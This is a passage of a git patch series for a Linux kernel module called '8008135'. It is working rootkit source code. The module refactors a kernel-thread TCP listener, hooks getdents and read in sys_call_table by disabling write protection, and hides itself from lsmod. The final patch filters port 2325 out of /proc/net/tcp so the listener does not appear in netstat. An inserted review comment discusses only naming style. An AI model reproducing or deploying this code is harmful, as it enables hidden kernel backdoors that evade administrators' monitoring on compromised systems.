while(skb_queue_empty(&LAcceptSocket->sk->sk_receive_queue)){ __set_current_state(TASK_INTERRUPTIBLE); 
schedule_timeout(HZ); 
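Review bot: The renamed identifiers (hunk -46,144, and the struct fields in hunk -35,9) adopt Delphi-style F/L/A/S prefixes and CamelCase, which go against the snake_case used by the rest of this module and by every kernel API it calls, and the scheme is already inconsistent inside the hunk: the new global is `FTCPServer_Service` while its sibling is `STCPConnHandler`, and `FAccpeptThread` carries a typo that every later reference will have to reproduce. Since this is a refactor with no behavioural change, it would be cheaper to keep snake_case and spend the patch on the `static` qualifier, which the hunk adds to `STCPListenerStopped`/`STCPAcceptorStopped` but not to the two global struct pointers nor to `inet_ntoa`, `tcp_server_send`, `tcp_server_receive` and `connection_handler`, none of which are declared in 50ck3t.h. The rename also carries the `msg_flags` overwrite and the duplicated `>> 16` in `inet_ntoa` forward unchanged; those are noted on the patch that introduced them.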
@@ -192,203 +194,187 @@ int connection_handler(void *data){ "thread stopped | connection_handler *** \n"); //tcp_conn_handler->thread[id] = NULL; - tcp_conn_handler->tcp_conn_handler_stopped[id]= 1; + STCPConnHandler->tcp_conn_handler_stopped[LID]= 1; __set_current_state(TASK_RUNNING); - remove_wait_queue(&accept_socket->sk->sk_wq->wait,\ + remove_wait_queue(&LAcceptSocket->sk->sk_wq->wait,\ &recv_wait); - kfree(tcp_conn_handler->data[id]->address); - kfree(tcp_conn_handler->data[id]); - sock_release(tcp_conn_handler->data[id]->accept_socket); + kfree(STCPConnHandler->data[LID]->FAddress); + kfree(STCPConnHandler->data[LID]); + sock_release(STCPConnHandler->data[LID]->FAcceptSocket); return 0; } if(signal_pending(current)){ __set_current_state(TASK_RUNNING); - remove_wait_queue(&accept_socket->sk->sk_wq->wait,\ + remove_wait_queue(&LAcceptSocket->sk->sk_wq->wait,\ &recv_wait); goto out; } } __set_current_state(TASK_RUNNING); - remove_wait_queue(&accept_socket->sk->sk_wq->wait, &recv_wait); + remove_wait_queue(&LAcceptSocket->sk->sk_wq->wait, &recv_wait); pr_info("receiving message\n"); - memset(in_buf, 0, len+1); - ret = tcp_server_receive(accept_socket, id, address, in_buf, len,\ + memset(LInBuf, 0, LLen+1); + LRet = tcp_server_receive(LAcceptSocket, LID, LAddress, LInBuf, LLen,\ MSG_DONTWAIT); - if(ret > 0){ - if(memcmp(in_buf, "HOLA", 4) == 0){ - memset(out_buf, 0, len+1); - strcat(out_buf, "HOLASI"); - pr_info("sending response: %s\n", out_buf); - tcp_server_send(accept_socket, id, out_buf,\ - strlen(out_buf), MSG_DONTWAIT); + if(LRet > 0){ + if(memcmp(LInBuf, "HOLA", 4) == 0){ + memset(LOutBuf, 0, LLen+1); + strcat(LOutBuf, "HOLASI"); + pr_info("sending response: %s\n", LOutBuf); + tcp_server_send(LAcceptSocket, LID, LOutBuf,\ + strlen(LOutBuf), MSG_DONTWAIT); } - /* - tmp = inet_ntoa(&(address->sin_addr)); - pr_info("connection handler: %d of: %s %d done sending " - " HOLASI\n", id, tmp, ntohs(address->sin_port)); - kfree(tmp); - */ - if(memcmp(in_buf, 
"ADIOS", 5) == 0){ - memset(out_buf, 0, len+1); - strcat(out_buf, "ADIOSAMIGO"); - pr_info("sending response: %s\n", out_buf); - tcp_server_send(accept_socket, id, out_buf,\ - strlen(out_buf), MSG_DONTWAIT); + if(memcmp(LInBuf, "ADIOS", 5) == 0){ + memset(LOutBuf, 0, LLen+1); + strcat(LOutBuf, "ADIOSAMIGO"); + pr_info("sending response: %s\n", LOutBuf); + tcp_server_send(LAcceptSocket, LID, LOutBuf,\ + strlen(LOutBuf), MSG_DONTWAIT); break; } } } out: - /* - tmp = inet_ntoa(&(address->sin_addr)); - - pr_info("connection handler: %d of: %s %d exiting normally\n", - id, tmp, ntohs(address->sin_port)); - kfree(tmp); - */ - tcp_conn_handler->tcp_conn_handler_stopped[id]= 1; - kfree(tcp_conn_handler->data[id]->address); - kfree(tcp_conn_handler->data[id]); - sock_release(tcp_conn_handler->data[id]->accept_socket); - //spin_lock(&tcp_server_lock); - tcp_conn_handler->thread[id] = NULL; - //spin_unlock(&tcp_server_lock); - //return 0; + STCPConnHandler->tcp_conn_handler_stopped[LID]= 1; + kfree(STCPConnHandler->data[LID]->FAddress); + kfree(STCPConnHandler->data[LID]); + sock_release(STCPConnHandler->data[LID]->FAcceptSocket); + STCPConnHandler->thread[LID] = NULL; do_exit(0); } int tcp_server_accept(void){ - int accept_err = 0; - struct socket *socket; - struct socket *accept_socket = NULL; - struct inet_connection_sock *isock; - int id = 0; + int LAcceptErr = 0; + struct socket *LSocket; + struct socket *LAcceptSocket = NULL; + struct inet_connection_sock *LISock; + int LID = 0; DECLARE_WAITQUEUE(accept_wait, current); allow_signal(SIGKILL|SIGSTOP); - socket = tcp_server->listen_socket; + LSocket = FTCPServer_Service->FListenSocket; pr_info(" *** mtp | creating the accept socket | tcp_server_accept " "*** \n"); while(1){ - struct tcp_conn_handler_data *data = NULL; - struct sockaddr_in *client = NULL; - char *tmp; + struct tcp_conn_handler_data *LTCPConnHData = NULL; + struct sockaddr_in *LClient = NULL; + char *LTmp; int addr_len; - accept_err = - 
sock_create(socket->sk->sk_family, socket->type,\ - socket->sk->sk_protocol, &accept_socket); + LAcceptErr = + sock_create(LSocket->sk->sk_family, LSocket->type,\ + LSocket->sk->sk_protocol, &LAcceptSocket); - if(accept_err < 0 || !accept_socket){ + if(LAcceptErr < 0 || !LAcceptSocket){ pr_info(" *** mtp | accept_error: %d while creating " "tcp server accept socket | " - "tcp_server_accept *** \n", accept_err); + "tcp_server_accept *** \n", LAcceptErr); goto err; } - accept_socket->type = socket->type; - accept_socket->ops = socket->ops; + LAcceptSocket->type = LSocket->type; + LAcceptSocket->ops = LSocket->ops; - isock = inet_csk(socket->sk); + LISock = inet_csk(LSocket->sk); - add_wait_queue(&socket->sk->sk_wq->wait, &accept_wait); - while(reqsk_queue_empty(&isock->icsk_accept_queue)){ + add_wait_queue(&LSocket->sk->sk_wq->wait, &accept_wait); + while(reqsk_queue_empty(&LISock->icsk_accept_queue)){ __set_current_state(TASK_INTERRUPTIBLE); schedule_timeout(HZ); if(kthread_should_stop()){ pr_info(" *** mtp | tcp server acceptor thread " "stopped | tcp_server_accept *** \n"); - tcp_acceptor_stopped = 1; + STCPAcceptorStopped = 1; __set_current_state(TASK_RUNNING); - remove_wait_queue(&socket->sk->sk_wq->wait,\ + remove_wait_queue(&LSocket->sk->sk_wq->wait,\ &accept_wait); - sock_release(accept_socket); + sock_release(LAcceptSocket); return 0; } if(signal_pending(current)){ __set_current_state(TASK_RUNNING); - remove_wait_queue(&socket->sk->sk_wq->wait,\ + remove_wait_queue(&LSocket->sk->sk_wq->wait,\ &accept_wait); goto release; } } __set_current_state(TASK_RUNNING); - remove_wait_queue(&socket->sk->sk_wq->wait, &accept_wait); + remove_wait_queue(&LSocket->sk->sk_wq->wait, &accept_wait); pr_info("accept connection\n"); - accept_err = - socket->ops->accept(socket, accept_socket, O_NONBLOCK); + LAcceptErr = + LSocket->ops->accept(LSocket, LAcceptSocket, O_NONBLOCK); - if(accept_err < 0){ + if(LAcceptErr < 0){ pr_info(" *** mtp | accept_error: %d while accepting " "tcp 
server | tcp_server_accept *** \n", - accept_err); + LAcceptErr); goto release; } - client = kmalloc(sizeof(struct sockaddr_in), GFP_KERNEL); - memset(client, 0, sizeof(struct sockaddr_in)); + LClient = kmalloc(sizeof(struct sockaddr_in), GFP_KERNEL); + memset(LClient, 0, sizeof(struct sockaddr_in)); addr_len = sizeof(struct sockaddr_in); - accept_err = - accept_socket->ops->getname(accept_socket,\ - (struct sockaddr *)client,\ + LAcceptErr = + LAcceptSocket->ops->getname(LAcceptSocket,\ + (struct sockaddr *)LClient,\ &addr_len, 2); - if(accept_err < 0){ + if(LAcceptErr < 0){ pr_info(" *** mtp | accept_error: %d in getname " "tcp server | tcp_server_accept *** \n", - accept_err); + LAcceptErr); goto release; } - tmp = inet_ntoa(&(client->sin_addr)); + LTmp = inet_ntoa(&(LClient->sin_addr)); pr_info("connection from: %s %d \n", - tmp, ntohs(client->sin_port)); + LTmp, ntohs(LClient->sin_port)); - kfree(tmp); + kfree(LTmp); pr_info("handle connection\n"); - for(id = 0; id < MAX_CONNS; id++){ - if(tcp_conn_handler->thread[id] == NULL) + for(LID = 0; LID < MAX_CONNS; LID++){ + if(STCPConnHandler->thread[LID] == NULL) break; } - pr_info("gave free id: %d\n", id); + pr_info("gave free id: %d\n", LID); - if(id == MAX_CONNS) + if(LID == MAX_CONNS) goto release; - data = kmalloc(sizeof(struct tcp_conn_handler_data), GFP_KERNEL); - memset(data, 0, sizeof(struct tcp_conn_handler_data)); + LTCPConnHData = kmalloc(sizeof(struct tcp_conn_handler_data), GFP_KERNEL); + memset(LTCPConnHData, 0, sizeof(struct tcp_conn_handler_data)); - data->address = client; - data->accept_socket = accept_socket; - data->thread_id = id; + LTCPConnHData->FAddress = LClient; + LTCPConnHData->FAcceptSocket = LAcceptSocket; + LTCPConnHData->FThreadID = LID; - tcp_conn_handler->tcp_conn_handler_stopped[id] = 0; - tcp_conn_handler->data[id] = data; - tcp_conn_handler->thread[id] = - kthread_run((void *)connection_handler, (void *)data, MODULE_NAME); + STCPConnHandler->tcp_conn_handler_stopped[LID] = 0; + 
STCPConnHandler->data[LID] = LTCPConnHData; + STCPConnHandler->thread[LID] = + kthread_run((void *)connection_handler, (void *)LTCPConnHData, MODULE_NAME); if(kthread_should_stop()){ pr_info(" *** mtp | tcp server acceptor thread stopped" " | tcp_server_accept *** \n"); - tcp_acceptor_stopped = 1; + STCPAcceptorStopped = 1; return 0; } 
@@ -399,60 +385,60 @@ int tcp_server_accept(void){ } - tcp_acceptor_stopped = 1; + STCPAcceptorStopped = 1; do_exit(0); release: - sock_release(accept_socket); + sock_release(LAcceptSocket); err: - tcp_acceptor_stopped = 1; + STCPAcceptorStopped = 1; do_exit(0); } int tcp_server_listen(void) { - int server_err; - struct socket *conn_socket; - struct sockaddr_in server; + int LServerErr; + struct socket *LConnSocket; + struct sockaddr_in LServer; DECLARE_WAIT_QUEUE_HEAD(wq); allow_signal(SIGKILL|SIGTERM); - server_err = sock_create(PF_INET, SOCK_STREAM, IPPROTO_TCP,\ - &tcp_server->listen_socket); - if(server_err < 0){ + LServerErr = sock_create(PF_INET, SOCK_STREAM, IPPROTO_TCP,\ + &FTCPServer_Service->FListenSocket); + if(LServerErr < 0){ pr_info(" *** mtp | Error: %d while creating tcp server " - "listen socket | tcp_server_listen *** \n", server_err); + "listen socket | tcp_server_listen *** \n", LServerErr); goto err; } - conn_socket = tcp_server->listen_socket; - tcp_server->listen_socket->sk->sk_reuse = 1; + LConnSocket = FTCPServer_Service->FListenSocket; + FTCPServer_Service->FListenSocket->sk->sk_reuse = 1; - server.sin_addr.s_addr = INADDR_ANY; - server.sin_family = AF_INET; - server.sin_port = htons(DEFAULT_PORT); + LServer.sin_addr.s_addr = INADDR_ANY; + LServer.sin_family = AF_INET; + LServer.sin_port = htons(DEFAULT_PORT); - server_err = - conn_socket->ops->bind(conn_socket, (struct sockaddr*)&server,\ - sizeof(server)); + LServerErr = + LConnSocket->ops->bind(LConnSocket, (struct sockaddr*)&LServer,\ + sizeof(LServer)); - if(server_err < 0){ + if(LServerErr < 0){ pr_info(" *** mtp | Error: %d while binding tcp server " - "listen socket | tcp_server_listen *** \n", server_err); + "listen socket | tcp_server_listen *** \n", LServerErr); goto release; } - server_err = conn_socket->ops->listen(conn_socket, 16); + LServerErr = LConnSocket->ops->listen(LConnSocket, 16); - if(server_err < 0){ + if(LServerErr < 0){ pr_info(" *** mtp | Error: %d while 
listening in tcp " "server listen socket | tcp_server_listen " - "*** \n", server_err); + "*** \n", LServerErr); goto release; } - tcp_server->accept_thread = + FTCPServer_Service->FAccpeptThread = kthread_run((void*)tcp_server_accept, NULL, MODULE_NAME); while(1){ @@ -469,19 +455,19 @@ int tcp_server_listen(void) } - sock_release(conn_socket); - tcp_listener_stopped = 1; + sock_release(LConnSocket); + STCPListenerStopped = 1; do_exit(0); release: - sock_release(conn_socket); + sock_release(LConnSocket); err: - tcp_listener_stopped = 1; + STCPListenerStopped = 1; do_exit(0); } int tcp_server_start(void){ - tcp_server->running = 1; - tcp_server->thread = kthread_run((void *)tcp_server_listen, NULL,\ + FTCPServer_Service->FRunning = 1; + FTCPServer_Service->FThread = kthread_run((void *)tcp_server_listen, NULL,\ MODULE_NAME); return 0; } @@ -489,11 +475,11 @@ int tcp_server_start(void){ int network_server_init(void){ pr_info(" *** mtp | network_server initiated | " "network_server_init ***\n"); - tcp_server = kmalloc(sizeof(struct tcp_server_service), GFP_KERNEL); - memset(tcp_server, 0, sizeof(struct tcp_server_service)); + FTCPServer_Service = kmalloc(sizeof(struct tcp_server_service), GFP_KERNEL); + memset(FTCPServer_Service, 0, sizeof(struct tcp_server_service)); - tcp_conn_handler = kmalloc(sizeof(struct tcp_conn_handler), GFP_KERNEL); - memset(tcp_conn_handler, 0, sizeof(struct tcp_conn_handler)); + STCPConnHandler = kmalloc(sizeof(struct tcp_conn_handler), GFP_KERNEL); + memset(STCPConnHandler, 0, sizeof(struct tcp_conn_handler)); tcp_server_start(); return 0; 
@@ -503,20 +489,20 @@ void network_server_exit(void){ int ret; int id; - if(tcp_server->thread == NULL) + if(FTCPServer_Service->FThread == NULL) pr_info(" *** mtp | No kernel thread to kill | " "network_server_exit *** \n"); else { for(id = 0; id < MAX_CONNS; id++) { - if(tcp_conn_handler->thread[id] != NULL) + if(STCPConnHandler->thread[id] != NULL) { - if(!tcp_conn_handler->tcp_conn_handler_stopped[id]) + if(!STCPConnHandler->tcp_conn_handler_stopped[id]) { ret = - kthread_stop(tcp_conn_handler->thread[id]); + kthread_stop(STCPConnHandler->thread[id]); if(!ret) pr_info(" *** mtp | tcp server " @@ -527,32 +513,32 @@ void network_server_exit(void){ } } - if(!tcp_acceptor_stopped) + if(!STCPAcceptorStopped) { - ret = kthread_stop(tcp_server->accept_thread); + ret = kthread_stop(FTCPServer_Service->FAccpeptThread); if(!ret) pr_info(" *** mtp | tcp server acceptor thread" " stopped | network_server_exit *** \n"); } - if(!tcp_listener_stopped) + if(!STCPListenerStopped) { - ret = kthread_stop(tcp_server->thread); + ret = kthread_stop(FTCPServer_Service->FThread); if(!ret) pr_info(" *** mtp | tcp server listening thread" " stopped | network_server_exit *** \n"); } - if(tcp_server->listen_socket != NULL && !tcp_listener_stopped) + if(FTCPServer_Service->FListenSocket != NULL && !STCPListenerStopped) { - sock_release(tcp_server->listen_socket); - tcp_server->listen_socket = NULL; + sock_release(FTCPServer_Service->FListenSocket); + FTCPServer_Service->FListenSocket = NULL; } - kfree(tcp_conn_handler); - kfree(tcp_server); - tcp_server = NULL; + kfree(STCPConnHandler); + kfree(FTCPServer_Service); + FTCPServer_Service = NULL; } } From 14a0ea6b8f45b09766afd7374a2f9f0047c2fd3c Mon Sep 17 00:00:00 2001 From: Jan Koerner Date: Sun, 8 Dec 2019 00:31:43 +0100 Subject: [PATCH 5/5] hide open port from netstat --- src/8008135.c | 72 ++++++++++++++++++++++++++++++++++++++++++- src/headers/8008135.h | 14 +++++++-- 2 files changed, 83 insertions(+), 3 deletions(-) 
diff --git a/src/8008135.c b/src/8008135.c index b5460b6..2189d71 100644 --- a/src/8008135.c +++ b/src/8008135.c 
@@ -85,6 +85,72 @@ asmlinkage long sys_getdents_new(unsigned int fd, } +/*** FUNCTION **************************************************************** +* NAME: hide port +* DESCRIPTION: hides the port 2325 +* PARAMETERS: - +* RETURNS: +*******************************************************************************/ +read_ptr orig_read; +asmlinkage long hacked_read(unsigned int fd, char __user *buf, + size_t count) +{ + long result, bp, diff_in_bytes; + char *kbuf, *start_line, *end_line, *port_num; + char *pathname, pbuf[256]; + struct files_struct *current_files; + struct fdtable *files_table; + struct path file_path; + + // run real read + result = (*orig_read)(fd,buf,count); + if (result <= 0) + return result; + + // get pathname + // CITATION [8] from report + current_files = current->files; + files_table = files_fdtable(current_files); + + file_path = files_table->fd[fd]->f_path; + pathname = d_path(&file_path,pbuf,256*sizeof(char)); + // if virtual file /proc/net/tcp + if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) { + // copy from user to kernelspace; + if (!access_ok(VERIFY_READ,buf,result)) + return -1; + if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL) + return -1; + if (copy_from_user(kbuf,buf,result)) + return -1; + + // filter out hidden ports + start_line = strchr(kbuf,':') - 4; // skip first line + diff_in_bytes = (start_line - kbuf) * sizeof(char); + for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) { + start_line = kbuf + bp; + port_num = strchr(strchr(start_line,':') + 1,':') + 1; + end_line = strchr(start_line,'\n'); + diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char); + if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port + memmove(start_line,end_line + 1, // delete line in file + result - bp - diff_in_bytes); + result -= diff_in_bytes; + } + } + + // copy from kernel to userspace + if (!access_ok(VERIFY_WRITE,buf,result)) + return EINVAL; + if (copy_to_user(buf,kbuf,result)) + return EINVAL; + 
kfree(kbuf); + } + // return number of bytes read + return result; +} + + /*** FUNCTION **************************************************************** * NAME: hide_module * DESCRIPTION: hides the module from lsmod @@ -115,13 +181,16 @@ static int __init init_8008135(void) { // add our new handlers sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new; + + orig_read = (read_ptr)sys_call_table[__NR_read]; + + sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read; // turn write protect back on write_cr0(read_cr0() | WRITE_PROTECT_FLAG); printk(KERN_INFO "New syscall in place\n"); network_server_init(); - hide_module(); printk(KERN_INFO "Module hidden"); @@ -140,6 +209,7 @@ static void __exit exit_8008135(void) { write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); // set getdents handler back sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig; + sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read; // turn write protect back on write_cr0(read_cr0() | WRITE_PROTECT_FLAG); printk(KERN_INFO "Old syscall back\n"); diff --git a/src/headers/8008135.h b/src/headers/8008135.h index c81cdf3..0ff10ae 100644 --- a/src/headers/8008135.h +++ b/src/headers/8008135.h @@ -28,11 +28,20 @@ #include #include "5y563n.h" +#include +#include +#include +#include +#include +#include +#include +#include /**** Defines ***************************************************************** *******************************************************************************/ #define GETDENTS_SYSCALL_NUM 78 +#define READ_SYSCALL_NUM 0 #define WRITE_PROTECT_FLAG (1<<16) #define HIDE_PREFIX "8008135." @@ -40,6 +49,7 @@ #define MODULE_NAME "8008135" #define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) +#define HIDE_PORT "0915" // 2325 in Hexadecimal /**** Modinfo **************************************************************** *******************************************************************************/ 
@@ -61,6 +71,6 @@ struct linux_dirent { typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count); - - +typedef asmlinkage long (*read_ptr)(unsigned int fd, char __user *buf, + size_t count); #endif /* SRC_HEADERS_8008135_H */